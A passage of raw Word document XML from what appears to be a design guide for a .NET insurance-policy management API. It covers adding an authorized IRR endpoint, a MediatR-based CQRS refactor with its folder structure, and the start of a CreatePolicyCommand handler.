          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            BenchmarkNifty50 = 13.5,  // 10yr CAGR</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.2  Add to Policy Detail API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// Add to PoliciesController:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[HttpGet("{id}/irr")]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[Authorize(Policy = "UserOrAdmin")]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public async Task&lt;IActionResult&gt; GetPolicyIRR(int id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var policy = await _context.Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .Include(p =&gt; p.Payments)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .Include(p =&gt; p.PolicyType)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .FirstOrDefaultAsync(p =&gt; p.Id == id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        ?? throw new KeyNotFoundException($"Policy {id} not found.");</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var result = _irrService.GetPolicyIRR(policy);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Ok(ApiResponse&lt;IrrResultDto&gt;.SuccessResponse(result));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec5" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 5 — Architecture Upgrades</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec5-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1  CQRS Pattern with MediatR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Package to Install</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dotnet add package MediatR.Extensions.Microsoft.DependencyInjection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New Folder Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PolicyManager.API/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">├── Application/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── Policies/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── Queries/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   │   ├── GetPoliciesQuery.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   │   ├── GetPoliciesQueryHandler.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   │   ├── GetPolicyByIdQuery.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   │   └── GetPolicyByIdQueryHandler.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── Commands/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │       ├── CreatePolicyCommand.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │       ├── CreatePolicyCommandHandler.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │       ├── UpdatePolicyCommand.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │       ├── UpdatePolicyCommandHandler.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │       └── MarkAsPaidCommand.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │       └── MarkAsPaidCommandHandler.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── Dashboard/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│       └── Queries/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│           ├── GetDashboardStatsQuery.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│           └── GetDashboardStatsQueryHandler.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">├── Domain/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── Events/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│       ├── PolicyCreatedEvent.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">│       └── PolicyPaidEvent.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Example — CreatePolicyCommand.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public record CreatePolicyCommand(CreatePolicyDto Dto, int UserId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    : IRequest&lt;PolicyDto&gt;;</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public class CreatePolicyCommandHandler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    : IRequestHandler&lt;CreatePolicyCommand, PolicyDto&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    private readonly AppDbContext _context;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    private readonly IMapper _mapper;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    private readonly IMediator _mediator;</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public async Task&lt;PolicyDto&gt; Handle(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        CreatePolicyCommand request,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        CancellationToken cancellationToken)</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var policy = _mapper.Map&lt;Policy&gt;(request.Dto);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
